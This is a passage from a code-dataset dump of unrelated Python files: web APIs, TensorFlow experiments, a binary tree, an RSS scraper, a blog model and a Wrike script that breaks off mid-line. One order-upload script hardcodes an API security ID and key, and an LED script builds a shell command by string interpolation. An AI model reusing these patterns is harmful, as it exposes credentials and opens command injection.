serverInstance.run()\n","sub_path":"bsdradius/webstuff/server/fastcgi_if.py","file_name":"fastcgi_if.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"329871523","text":"from fastapi import APIRouter\nfrom fastapi import HTTPException\n\nfrom app.config import memory_cache\nfrom app.domain.entity import Entity\nfrom app.domain.source import Source\nfrom app.event_server.utils.memory_cache import MemoryCache, CacheItem\n\n\nrouter = APIRouter()\n\n\nclass SourceCacher:\n\n def __init__(self):\n self._cache = MemoryCache()\n\n async def validate_source(self, source_id) -> Source:\n entity = Entity(id=source_id)\n\n source = await self.get(entity) # type: Source\n if source is None:\n raise HTTPException(detail=\"Access denied. Invalid source.\", status_code=401)\n\n if not source.enabled:\n raise HTTPException(detail=\"Access denied. Source disabled.\", status_code=404)\n\n return source\n\n async def get(self, source: Entity):\n if 'source' in self._cache:\n source = self._cache['source'].data\n return source\n else:\n # Expired\n source = await source.storage(\"source\").load(Source) # type: Source\n if source is not None:\n self._cache['source'] = CacheItem(data=source, ttl=memory_cache.source_ttl)\n return source\n return None\n\n\nsource_cache = SourceCacher()\n","sub_path":"app/event_server/service/source_cacher.py","file_name":"source_cacher.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"581575913","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\ndef fancy_calculate_number_of_ones(number):\r\n \"\"\"Only use this once it is supported\"\"\"\r\n\r\n # https://stackoverflow.com/questions/109023/how-to-count-the-number-of-set-bits-in-a-32-bit-integer\r\n #i = i - ((i >> 1) & 0x55555555);\r\n #i = (i & 0x33333333) + ((i >> 2) & 0x33333333);\r\n #return (((i + (i >> 4)) & 0x0F0F0F0F) * 0x01010101) >> 24;\r\n\r\n # (i + (i >> 4))\r\n\r\n fivers = tf.constant(0x55555555, dtype=tf.int32)\r\n threes = tf.constant(0x33333333, dtype=tf.int32)\r\n ffs = tf.constant(0x0F0F0F0F, dtype=tf.int32)\r\n ones = tf.constant(0x01010101, dtype=tf.int32)\r\n threes_64 = tf.constant(0o033333333333, dtype=tf.int64)\r\n full_ones = tf.constant(0o011111111111, dtype=tf.int64)\r\n sevens = tf.constant(0o030707070707, dtype=tf.int64)\r\n\r\n #i = i - ((i >> 1) & 0x55555555);\r\n i = number - tf.bitwise.bitwise_and(tf.bitwise.right_shift(number, 1), fivers)\r\n\r\n #i = (i & 0x33333333) + ((i >> 2) & 0x33333333);\r\n i = tf.bitwise.bitwise_and(tf.bitwise.right_shift(i, 1), threes) + \\\r\n tf.bitwise.bitwise_and(tf.bitwise.right_shift(i, 2), threes)\r\n\r\n # (((i + (i >> 4)) & 0x0F0F0F0F) * 0x01010101)\r\n i = tf.bitwise.bitwise_and(i + tf.bitwise.right_shift(i, 4), ffs) * ones\r\n\r\n # i >> 24\r\n i = tf.bitwise.right_shift(i, 24)\r\n\r\n\r\n number = tf.cast(number, tf.int64)\r\n bitwise1 = tf.bitwise.bitwise_and(tf.bitwise.right_shift(number, 1), threes_64)\r\n bitwise2 = tf.bitwise.bitwise_and(tf.bitwise.right_shift(number, 2), full_ones)\r\n uCount = number - bitwise1 - bitwise2\r\n\r\n bitwise3 = tf.bitwise.bitwise_and(uCount + tf.bitwise.right_shift(uCount, 3), sevens)\r\n result = tf.mod(bitwise3, 63)\r\n #result = tf.Print(result, [result, i])\r\n i = tf.Print(i, [number, i, result])\r\n #return result\r\n return i\r\n\r\n\r\n\r\ndef test1():\r\n\r\n session = tf.Session(config=tf.ConfigProto(\r\n device_count={'GPU': 0}\r\n ))\r\n\r\n input = tf.placeholder(tf.int32, shape=[1])\r\n\r\n result = fancy_calculate_number_of_ones(input)\r\n for i in range(17):\r\n array = np.array([i])\r\n session.run(result, feed_dict={input: array})\r\n\r\n\r\n\r\ndef test2():\r\n\r\n session = tf.Session(config=tf.ConfigProto(\r\n device_count={'GPU': 0}\r\n ))\r\n\r\n input = tf.placeholder(tf.int32, shape=[1])\r\n\r\n result = tf.bitwise.right_shift(input, 2)\r\n divide = input // 4\r\n\r\n result = tf.Print(result, [input, result, divide])\r\n for i in range(17):\r\n array = np.array([i])\r\n session.run(result, feed_dict={input: array})\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #test1()\r\n test2()\r\n","sub_path":"bot_code/tests/bit_tests.py","file_name":"bit_tests.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"117520813","text":"from factors.SimilarityFactor import calculateSimilarity\nfrom factors.ExpertFactor import calculateExpert\nfrom factors.FriendlyFactor import calculateFriendly\nfrom factors.LeaderFactor import calculateLeadership\nfrom factors.FinalFactor import generateFinalFactor\n\ndef getInfluenceFactors(social_resume):\n data = { \"users\": social_resume }\n\n # similarityMatrix = calculateSimilarityMatrix(data)\n similarities = calculateSimilarity(data)\n print(\"similarities: {}\" .format(similarities))\n\n # Expert Factor\n expert = calculateExpert(data)\n print(\"Expert: {}\" .format(expert))\n\n # Friendly Factor\n friendly = calculateFriendly(data)\n \n\n print(\"Friendly:{}\" .format(friendly))\n\n #leadership Factor\n leadership = calculateLeadership(data)\n print (\"Leadership:{}\" .format(leadership))\n\n\n \n final = generateFinalFactor(similarities, expert, friendly, leadership)\n print (\"Final:{}\" .format(final))\n\n influence_factors = {\n \"similarities\": similarities,\n \"expert\": expert,\n \"friendly\": friendly,\n \"leadership\": leadership,\n \"final\": final\n }\n\n return influence_factors\n","sub_path":"src/factors/Influence.py","file_name":"Influence.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"111780320","text":"\nclass Tree:\n root = None\n\n def addNode(self, n):\n if (self.root is None):\n self.root = n\n else:\n self.root.addNode(n)\n\n def addValue(self,index,val):\n n = Node(index,val)\n self.addNode(n)\n\n\n def traverse(self):\n l = []\n self.root.visit(l)\n return(l)\n\n def search(self, i):\n return(self.root.search(i))\n\nclass Node:\n index = None\n value = None\n left = None\n right = None\n\n def __init__(self, i, val):\n self.index = i\n self.value = val\n\n def addNode(self, n):\n if(n.index < self.index):\n if(self.left is None):\n self.left = n\n else:\n self.left.addNode(n)\n elif(n.index > self.index):\n if(self.right is None):\n self.right = n\n else:\n self.right.addNode(n)\n\n def visit(self, l):\n if(self.right is not None ):\n self.right.visit(l)\n l.append(self.value)\n if(self.left is not None):\n self.left.visit(l)\n\n def search(self,i):\n if(self.index == i):\n return(self.value)\n elif(i > self.index) and (self.right is not None ):\n return(self.right.search(i))\n elif(i < self.index) and (self.left is not None ):\n return(self.left.search(i))\n return None\n\n\"\"\"\nCodeExample:\n# initializing new tree\ntree = Tree()\n# Adding new Node\nn = Node(5, 5)\ntree.addNode(n)\n# Adding value for cleaner code\ntree.addValue(7,7)\n\n# Getting sorted list from binary tree. high to low\nlist = tree.traverse()\n[7,5]\n\n# Search the binary tree. Nonetype if nothing exists\nsearch = tree.search(5)\n5\n\n\"\"\"\n","sub_path":"binarytree.py","file_name":"binarytree.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"590780996","text":"\"\"\"\nURLs file for OCR app.\n\"\"\"\nfrom django.conf.urls import url\nfrom rest_framework import routers\n\n# from ocr import views\nfrom ocr.views import ocr_datasource_config_list, ProjectView, \\\n get_dashboard_metrics, get_recent_activity\nfrom ocr.views import OCRImageView, OCRImagesetView, OCRUserView, \\\n OCRUserProfileView, GroupListView\n\n# -------------------------------------------------------------------------------\n# pylint: disable=too-many-ancestors\n# pylint: disable=no-member\n# pylint: disable=too-many-return-statements\n# pylint: disable=too-many-locals\n# pylint: disable=too-many-branches\n# pylint: disable=invalid-name\n# pylint: disable=line-too-long\n# -------------------------------------------------------------------------------\n\nrouter = routers.DefaultRouter()\nrouter.register(\n 'ocrimage',\n OCRImageView,\n base_name='ocrimages'\n)\n\nrouter.register(\n 'ocrimageset',\n OCRImagesetView,\n base_name='ocrimagesets'\n)\n\nrouter.register(\n 'user',\n OCRUserView,\n base_name='user'\n)\n\nrouter.register(\n 'userprofile',\n OCRUserProfileView,\n base_name='userprofile'\n)\nrouter.register(\n 'project',\n ProjectView,\n base_name='projects'\n)\n\nurlpatterns = [\n url(r'^datasource/ocr_datasource_config_list$', ocr_datasource_config_list, name=\"ocr_datasource_config_list\"),\n url(r'^groups/',GroupListView.as_view(), name=\"groups\"),\n url(r'^get_dashboard_metrics', get_dashboard_metrics, name=\"get_dashboard_metrics\"),\n url(r'^get_recent_activity', get_recent_activity, name=\"get_recent_activity\"),\n\n]\nurlpatterns += router.urls\n","sub_path":"ocr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"259012284","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 17 11:41:59 2020\n\n@author: chenghaili\n\"\"\"\n\nimport os\nos.chdir(os.path.abspath(os.path.join(os.getcwd(), \"..\")))\n\nimport args\nimport time\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras import layers\n\n# Init args\nn = args.n\nsize = args.size\ndrug = args.drug\ndrug_quantity = args.drug_quantity\nporosity = args.porosity\nblobiness = args.blobiness\npath = args.path\n\ndata = np.load(path+'data.npy')\ndata = tf.convert_to_tensor(data)\ndata = tf.expand_dims(data, -1)\n\nnoise_dim = 100\nBATCH_SIZE = 10\nBUFFER_SIZE = 50\nEPOCHS = 200\n\ntrain_dataset = tf.data.Dataset.from_tensor_slices(data).shuffle(BUFFER_SIZE).batch(BATCH_SIZE)\n\ndef make_generator_model():\n \n model = tf.keras.Sequential()\n \n model.add(layers.Dense( 16 * 16 * 64, use_bias=False, input_shape=(noise_dim,)))\n model.add(layers.BatchNormalization())\n model.add(layers.LeakyReLU())\n\n model.add(layers.Reshape((16, 16, 64)))\n\n model.add(layers.Conv2DTranspose(32, (5, 5), strides=(2, 2), padding='same', use_bias=False))\n model.add(layers.BatchNormalization())\n model.add(layers.LeakyReLU())\n\n model.add(layers.Conv2DTranspose(1, (10, 10), strides=(4, 4), padding='same', use_bias=False, activation='sigmoid'))\n\n return model\n\ndef make_discriminator_model():\n \n model = tf.keras.Sequential()\n \n model.add(layers.Conv2D(32, (10, 10), strides=(4, 4), padding='same', input_shape=[128, 128, 1]))\n model.add(layers.LeakyReLU())\n model.add(layers.Dropout(0.3))\n\n model.add(layers.Conv2D(64, (5, 5), strides=(2, 2), padding='same'))\n model.add(layers.LeakyReLU())\n model.add(layers.Dropout(0.3))\n \n model.add(layers.Flatten())\n model.add(layers.Dense(1))\n\n return model\n\ngenerator = make_generator_model()\ndiscriminator = make_discriminator_model()\n\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\ndef discriminator_loss(real_output, fake_output):\n real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)\n total_loss = real_loss + fake_loss\n return total_loss\n\ndef generator_loss(fake_output):\n return cross_entropy(tf.ones_like(fake_output), fake_output)\n\n@tf.function\ndef train_step(images):\n noise = tf.random.normal([BATCH_SIZE, noise_dim])\n\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n generated_images = generator(noise, training=True)\n\n real_output = discriminator(images, training=True)\n fake_output = discriminator(generated_images, training=True)\n\n gen_loss = generator_loss(fake_output)\n disc_loss = discriminator_loss(real_output, fake_output)\n\n gradients_of_generator = gen_tape.gradient(gen_loss, generator.trainable_variables)\n gradients_of_discriminator = disc_tape.gradient(disc_loss, discriminator.trainable_variables)\n\n generator_optimizer.apply_gradients(zip(gradients_of_generator, generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, discriminator.trainable_variables))\n \n return tf.reduce_sum(gen_loss), tf.reduce_sum(disc_loss)\n \ndef train(dataset, epochs):\n \n for epoch in range(epochs):\n start = time.time()\n g = 0\n d = 0\n for image_batch in dataset:\n gen_l, disc_l = train_step(image_batch)\n g += gen_l\n d += disc_l\n print ('epoch {} use {:.5f} sec, G_l {:.5f}, D_l {:.5f}'.format(epoch + 1, time.time()-start, g, d))\n \ngenerator_optimizer = tf.keras.optimizers.Adam(1e-3)\ndiscriminator_optimizer = tf.keras.optimizers.Adam(2e-5)\n \ntrain(train_dataset, EPOCHS)\n\nnoise = tf.random.normal([1, noise_dim])\ngenerated_image = generator(noise, training=False)\n\nplt.imshow(generated_image[0, :, :, 0])\ndecision = discriminator(generated_image)\nprint (decision)","sub_path":"2D version/Neural network/DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"62952298","text":"import requests\nimport json\n\nfrom janio_order import models as order_models\n\n\ndef submitToSatsaco(agent, order_ids):\n orders = order_models.Order.objects.filter(agent_id=agent, order_id__in=order_ids)\n\n orders_data = []\n\n for order in orders:\n order_data = {}\n\n order_data['packing_id'] = order.tracking_no\n order_data['consignee_name'] = order.consignee_name\n order_data['consignee_number'] = order.consignee_number\n order_data['consignee_address'] = order.consignee_address\n order_data['consignee_postal'] = order.consignee_postal\n order_data['consignee_country'] = order.consignee_country\n order_data['consignee_city'] = order.consignee_city\n order_data['consignee_state'] = order.consignee_state\n order_data['consignee_number'] = order.consignee_number\n order_data['consignee_email'] = order.consignee_email\n order_data['order_length'] = float(order.order_length)\n order_data['order_width'] = float(order.order_width)\n order_data['order_height'] = float(order.order_height)\n order_data['order_weight'] = float(order.order_weight)\n order_data['pickup_address'] = order.pickup_address\n order_data['items'] = []\n\n items = order_models.Item.objects.filter(order_id=order)\n num_of_items = 0\n for item in items:\n item_data = {}\n\n item_data['item_product_id'] = item.item_product_id\n item_data['item_sku'] = item.item_sku\n item_data['item_desc'] = item.item_desc\n item_data['item_quantity'] = item.item_quantity\n item_data['item_category'] = item.item_category\n item_data['item_price_value'] = float(item.item_price_value)\n item_data['item_price_currency'] = item.item_price_currency\n\n order_data['items'].append(item_data)\n\n orders_data.append(order_data)\n\n r = requests.post('http://waterman.com.sg/satsaco/api/upload_order', data = {\n 'security_id': '00lnnlmv86',\n 'security_key': 'px0418yajz7rjm82ikjw37kwhkoy92hj',\n 'orders': json.dumps(orders_data),\n })\n\n # print(r.status_code)\n # print(r.text)\n","sub_path":"janio_order/externalServiceUtils.py","file_name":"externalServiceUtils.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"366812742","text":"\n# python standard library\nimport os\nimport zipfile\n\nimport feedparser\n# 3rd-party, pip installed libraries\nimport pandas as pd\n\npd.set_option(\"display.float_format\", lambda x: \"%.5f\" % x) # pandas\npd.set_option(\"display.max_columns\", 100)\npd.set_option(\"display.max_rows\", 100)\npd.set_option(\"display.width\", 600)\n\npd.set_option('expand_frame_repr', True)\npd.set_option('max_rows', 50)\npd.set_option('display.max_rows', 50)\n\nrss_url = r'http://www.globenewswire.com/AtomFeed/orgclass/1/feedTitle/GlobeNewswire%20-%20News%20about%20Public%20Companiesc'\nearnings_url = r'http://www.globenewswire.com/AtomFeed/subjectcode/13-Earnings%20Releases%20And%20Operating%20Results/feedTitle/GlobeNewswire%20-%20Earnings%20Releases%20And%20Operating%20Results'\ndiv_rss = r'http://www.globenewswire.com/AtomFeed/subjectcode/12-Dividend%20Reports%20And%20Estimates/feedTitle/GlobeNewswire%20-%20Dividend%20Reports%20And%20Estimates'\nmna_Rss = r'http://www.globenewswire.com/AtomFeed/subjectcode/27-Mergers%20And%20Acquisitions/feedTitle/GlobeNewswire%20-%20Mergers%20And%20Acquisitions'\nprnewswire_rss = r'https://www.prnewswire.com/rss/all-news-releases-from-PR-newswire-news.rss'\nrss_feeds = r'D:\\PROJECTS\\presentations\\rss_feeds.csv'\npr_rss1 = r'https://www.prnewswire.com/rss/financial-services-latest-news.rss'\nnas_rss = r'http://ir.nasdaq.com/rss/news-releases.xml?items=15'\nprweb_rss = r'http://www.prweb.com/rss2/daily.xml'\n\ndef flatten_json(dictionary):\n \"\"\"Flatten a nested json file\"\"\"\n from itertools import chain, starmap\n\n def unpack(parent_key, parent_value):\n \"\"\"Unpack one level of nesting in json file\"\"\"\n # Unpack one level only!!!\n\n if isinstance(parent_value, dict):\n for key, value in parent_value.items():\n temp1 = parent_key + '_' + key\n yield temp1, value\n elif isinstance(parent_value, list):\n i = 0\n for value in parent_value:\n temp2 = parent_key + '_' + str(i)\n i += 1\n yield temp2, value\n else:\n yield parent_key, parent_value\n # Keep iterating until the termination condition is satisfied\n\n while True:\n # Keep unpacking the json file until all values are atomic elements (not dictionary or list)\n dictionary = dict(chain.from_iterable(starmap(unpack, dictionary.items())))\n # Terminate condition: not any value in the json file is dictionary or list\n if not any(isinstance(value, dict) for value in dictionary.values()) and \\\n not any(isinstance(value, list) for value in dictionary.values()):\n break\n\n return dictionary\n\nfrom datetime import datetime\ndf = pd.read_csv(rss_feeds)\n\ndata_dir = os.path.join(os.getcwd(), \"data\\\\rss\")\n\nimport pandas as pd\n\nkeep = ('title', 'link', 'published', 'published_parsed', 'summary', 'id')\n\ndf_filtered = df[df['CATEGORY'].isin(['business', 'politics', 'science', 'tech','general'])]\ndf_filtered_us = df_filtered[df_filtered['COUNTRY_CODE'].isin(['US'])]\n\n_entries = []\nall_entries = []\n\nfrom urllib import parse\nimport tldextract\n\nfor i, feed in df_filtered_us.iterrows():\n print(feed)\n url = \"https://\" + feed.URL\n parsed_url = parse.urlparse(url)\n print(parsed_url)\n dom = tldextract.extract(url)\n # filename = f'{dom.domain}.csv'\n folderpath = os.path.join(f'.\\\\data\\\\rss\\\\{dom.domain}')\n\n if not os.path.exists(folderpath):\n os.mkdir(folderpath)\n\n filename = f\"{datetime.now().strftime('%Y-%m-%dT%H-%M-%S')}.csv\"\n\n filepath = os.path.join(folderpath, filename)\n\n print(filepath)\n\n _entries = []\n\n _feed = feedparser.parse(url)\n\n if len(_feed.entries) == 0:\n print(\"FOUND 0 Entries\\n\\n\")\n url = \"http://\" + feed.URL\n _feed = feedparser.parse(url)\n\n for entry in _feed.entries:\n\n final_dict = flatten_json(entry)\n _entries.append(final_dict)\n\n _title = entry.get(\"title\", \"No Title\")\n _published = entry.get('updated', None)\n\n if not _published:\n _published = entry.get('published', None)\n\n headline_dict = {\"title\": _title, \"published\": _published, \"source\": dom.domain }\n\n all_entries.append(headline_dict)\n\n df_entries = pd.DataFrame(_entries)\n\n df_entries['datasource'] = dom.domain\n df_entries.to_csv(filepath)\n\ndf = pd.DataFrame(all_entries)\ndf = df.sort_values('published', ascending=False)\ndf.reset_index(inplace=True,drop=True)\ndf.to_csv(os.path.join(f\"headlines_{datetime.now().strftime('%Y-%m-%d %H-%M-%S')}.csv\"))\n","sub_path":"06-flask/flask-rss/other/rss_feed.py","file_name":"rss_feed.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"393322628","text":"import os\n\ndirname = \"/data/burak/deeplearning/\"\n#filenames = glob.glob(dirname + \"Uni-Processed/**/*.html\", recursive=True)\noutfilename = dirname + \"merge2.txt\"\n\nwith open(outfilename, 'w') as outfile:\n\tfor subdir, dirs, files in os.walk(dirname + \"Uni-Processed/\"):\n\t\tfor fname in files:\n\t\t\tif fname.endswith('.html'):\n\t\t\t\twith open(os.path.join(subdir, fname), 'r') as readfile:\n\t\t\t\t\toutfile.write(readfile.read().replace('\\n', ' ').replace('\\t', ' ') + \"\\n\")\n","sub_path":"onefileperline.py","file_name":"onefileperline.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290637097","text":"import time\nimport subprocess \nthink = \"tpacpi::thinklight\"\npower = \"tpacpi::power\"\nvantage = \"tpacpi::thinkvantage\"\nstandby = \"tpacpi::standby\"\n\nmmc0 = \"mmc0::\"\nphy0 = \"phy0-led\"\n\n\ntarget = open(\"/dev/null\",'r')\nfname = \"/dev/null\"\n\n\ndef load(led):\n\tglobal fname\n\tglobal target\n\ttarget = open(\"/sys/class/leds/\" + str(led) + \"/brightness\",'w')\n\tfname = \"/sys/class/leds/\" + str(led) + \"/brightness\"\ndef setled(state):\n\tglobal target\n\ttarget.write(state)\n\ttarget.flush()\n\ndef getled():\n\tt = open(fname,'r')\n\treturn t.next()\n\ndef setbacklight(brightness):\n\tsubprocess.call(\"echo \" + str(brightness) + \" > /sys/class/backlight/acpi_video0/brightness\", shell = True)\n","sub_path":"hardwarelib.py","file_name":"hardwarelib.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"29582417","text":"import time\nfrom models import Mongodb\nfrom utils import log\nfrom models.user import User\nimport io\nimport re\nimport os\nimport config\n\n\ndef filtered_blog(blog, **kwargs):\n valid_attributes = [\n 'id',\n 'title',\n 'content',\n # 'created_time',\n 'ct',\n 'nextId',\n 'nextTitle',\n 'prevId',\n 'prevTitle',\n ]\n form = {}\n for key in valid_attributes:\n if hasattr(blog, key):\n value = getattr(blog, key)\n form[key] = value\n if (kwargs.get('abstract', False)):\n form['content'] = form['content'][: 300]\n return form\n\n\ndef filtered_blogs(blogs, **kwargs):\n blog_list = []\n for blog in blogs:\n blog_list.append(filtered_blog(blog, **kwargs))\n return blog_list\n\n\nclass Blog(Mongodb):\n __fields__ = Mongodb.__fields__ + [\n ('id', str, ''),\n ('title', str, ''),\n ('excerpt', str, ''),\n # ('content', str, ''),\n ('body', str, ''),\n ('next_title', str, ''),\n ('previous_title', str, ''),\n ('user_id', int, -1),\n ('views', int, 0),\n ('cover_name', str, ''),\n # ('author', str, ''),\n ('next_id', str, ''),\n ('previous_id', str, ''),\n ]\n\n @classmethod\n def new(cls, form, **kwargs):\n blog = super().new(form, **kwargs)\n log('new blog', blog)\n u = User.current_user()\n setattr(blog, 'user_id', u._id)\n blog.id = str(blog._id)\n blog.save()\n Blog.update_adjacency()\n # log('after add user info, blog', blog)\n return blog\n\n @classmethod\n def update(cls, id, form):\n t = cls.find(id)\n log('要尝试更新的博客', t)\n log('update 传进来的 form 和 id', form, id)\n if t is None:\n log('尝试对一个不存在的博客更新')\n return None\n for key in form:\n setattr(t, key, form[key])\n t.ut = int(time.time())\n t.save()\n Blog.update_adjacency()\n return t\n\n @classmethod\n def all(cls, **kwargs):\n blogs = super().all(**kwargs)\n blogs.reverse()\n # bs = [b.json() for b in blogs]\n # bs = [b.remove('deleted') for b in bs]\n return blogs\n\n def increase_visits(self):\n self.visits += 1\n self.save()\n\n def update_replies(self):\n self.replies = len(self.comments())\n self.save()\n\n def comments(self):\n all_comments = Comment.find_all(blog_id=self._id)\n return all_comments\n\n def json(self):\n # log('json blog object start')\n d = self.__dict__.copy()\n log('json end, self', d)\n return d\n\n def delete(self):\n # Comment.delete_all(blog_id=self._id)\n self.deleted = True\n self.update_adjacency()\n self.save()\n\n @classmethod\n def _update_first(cls):\n blogs = Blog.all()\n first = blogs[0]\n log('要更新的最新的一个 blog 是', first)\n first.next_id = ''\n first.next_title = ''\n first.save()\n\n @classmethod\n def _update_last(cls):\n blogs = Blog.all()\n last = blogs[-1]\n log('要更新的最旧的一个 blog 是', last)\n last.previous_id = ''\n last.previous_title = ''\n log('这个blog 的 previous', last.previous_id, last.previous_title)\n last.save()\n\n @classmethod\n def update_adjacency(cls):\n log('更新邻近 blog')\n blogs = Blog.all()\n log('所有的 blog', blogs)\n\n if len(blogs) == 0:\n return\n\n for i, blog in enumerate(blogs):\n if i > 0:\n next_blog = blogs[i - 1]\n blog.next_id = next_blog.id\n blog.next_title = next_blog.title\n if i < len(blogs) - 1:\n prev_blog = blogs[i + 1]\n blog.previous_id = prev_blog.id\n blog.previous_title = prev_blog.title\n blog.save()\n\n Blog._update_first()\n Blog._update_last()\n \n @classmethod\n def find_all(cls, **kwargs):\n blogs = super().find_all(**kwargs)\n return blogs\n\n @classmethod\n def find_by(cls, **kwargs):\n blog = super().find_by(**kwargs)\n log('find by id : blog', blog)\n # if blog is None or blog.deleted is True:\n # return None\n return blog\n\n @classmethod\n def assembled(cls, form):\n content = form.pop('content')\n content_list = re.split(r'[\\r\\n]', content, 1)\n\n title = content_list[0]\n body = content_list[1].lstrip()\n log('生成的 body ', body)\n log('拆分body', re.split(r'[\\r\\n]', body, 1))\n excerpt = re.split(r'[\\r\\n]', body, 1)[0].strip()\n log('生成的简介', excerpt)\n form['body'] = body\n form['excerpt'] = excerpt\n form['title'] = title\n\n cover_name = form.get('cover_name', None)\n if cover_name is not None:\n cover_name = os.path.join(config.server_path, cover_name)\n form['cover_name'] = cover_name\n\n return form\n\n\n# 评论类\nclass Comment(Mongodb):\n def __init__(self, form, user_id=-1):\n self._id = form.get('id', None)\n self.author = form.get('author', '待定')\n self.content = form.get('content', '')\n # 和别的数据关联的方式, 用 user_id 表明拥有它的 user 实例\n self.user_id = form.get('user_id', user_id)\n self.blog_id = int(form.get('blog_id', -1))\n self.reply_id = int(form.get('reply_id', -1))\n self.root_id = int(form.get('root_id', -1))\n self.ct = int(time.time())\n self.ut = self.ct\n self.deleted = False\n self.agreed = 0\n\n @staticmethod\n def default_content():\n return '该评论已删除'\n\n def delete(self):\n self.deleted = True\n self.save()\n\n @classmethod\n def delete_all(cls, **kwargs):\n blogs = cls.all()\n for k, v in kwargs.items():\n for b in blogs:\n if b.__dict__[k] == v and b.deleted is False:\n b.delete()\n\n @classmethod\n def find_all(cls, **kwargs):\n comments = super().find_all(**kwargs)\n cs = []\n for c in comments:\n if c.deleted is True:\n c.content = cls.default_content()\n cs.append(c)\n # cs = [c for c in comments if c.deleted is False]\n return cs\n\n @classmethod\n def find_by(cls, **kwargs):\n comment = super().find_by(**kwargs)\n if comment is None or comment.deleted is True:\n return None\n return comment\n\n def agree(self):\n self.agreed += 1\n self.save()\n","sub_path":"models/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"606763976","text":"from .. import base\n\n\nclass SeleniumCommand(base.Command):\n\n def __init__(self, ifc, *args, **kwargs):\n self.ifc = ifc\n if self.ifc is None:\n raise TypeError('Selenium interface cannot be None.')\n assert self.ifc.is_opened()\n self.api = self.ifc.api\n\n super(SeleniumCommand, self).__init__(*args, **kwargs)\n\n def __repr__(self):\n parent = super(SeleniumCommand, self).__repr__()\n opt = {}\n opt['session_id'] = self.api.session_id\n opt['url'] = self.api.command_executor._url\n return parent + \"(url=%(url)s session_id=%(session_id)s)\" % opt\n","sub_path":"f5test/commands/ui/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"180922531","text":"# coding:utf-8\n\nimport os\nimport sys\n\nf_date = sys.argv[1]\n\nif __name__ == \"__main__\":\n i = 1\n while i < 14:\n file_name = 'url_{0}_'.format(f_date) + str(i) + 'kw'\n start_num = (i - 1) * 10000000 + 1\n end_num = 10000000 * i\n cmd1 = \"sed -n '{0},{1}p' url_{2} >>{3}\".format(start_num, end_num, f_date, file_name)\n os.system(cmd1)\n i += 1\n","sub_path":"course_test/31_split_file.py","file_name":"31_split_file.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"476623541","text":"import sys\r\nimport requests\r\nimport json\r\nfrom pandas.io.json import json_normalize\r\n\r\n\r\n# This script is used to find and clean a map full of tasks using the wrike api\r\n# first, a user is asked for the map name after which the program initializes the process.\r\n\r\nprint(\"please enter the exact name of the map\")\r\nfilename = input()\r\nprint(\"The chosen file name is: \" + filename)\r\n# Find filename in wrike db and pull correct projectID\r\nurl = \"https://app-eu.wrike.com/api/v3/folders?project=false&deleted=false\"\r\nwith open(\"authorization.txt\",\"r\") as f:\r\n headers['authorization'] = f.read()\r\nprint(headers)\r\n\r\nresponse = requests.get(url, headers=headers)\r\nyields = str(response.text)\r\nyields = yields.replace('☎', 'tel')\r\n\r\nwith open('wriketemp.json', 'w+') as outf:\r\n outf.write(yields)\r\nwith open('wriketemp.json') as f:\r\n result = json.load(f)\r\nmapdictionary= {}\r\nfor i in range(len(result[\"data\"])):\r\n mapdictionary[result[\"data\"][i][\"title\"]] = result[\"data\"][i][\"id\"]\r\ntry:\r\n mapID = mapdictionary[filename]\r\nexcept(KeyError):\r\n print(\"Map name invalid, try again:\")\r\n filename = input()\r\n# Callback to issue command again\r\n# Now that we know the mapId we can pull all tasks from said map:\r\nurl = \"https://app-eu.wrike.com/api/v3/folders/\"+mapID+\"/tasks?descendants=true&pageSize=1000&fields=['customFields','authorIds']\"\r\nresponse = requests.get(url, headers=headers)\r\nwith open(filename+\".json\", 'w+') as outf:\r\n outf.write(response.text)\r\nwith open(filename+\".json\") as f:\r\n data = json.load(f)\r\nusernamedict = {}\r\ncustomfieldsdict = {}\r\nfor y in range(len(data[\"data\"])):\r\n for i in data[\"data\"][y][\"customFields\"]:\r\n cf = i['id']\r\n if cf in customfieldsdict.keys():\r\n i['id'] = customfieldsdict[cf]\r\n else:\r\n print(\"customFieldID not present, calling API\")\r\n url 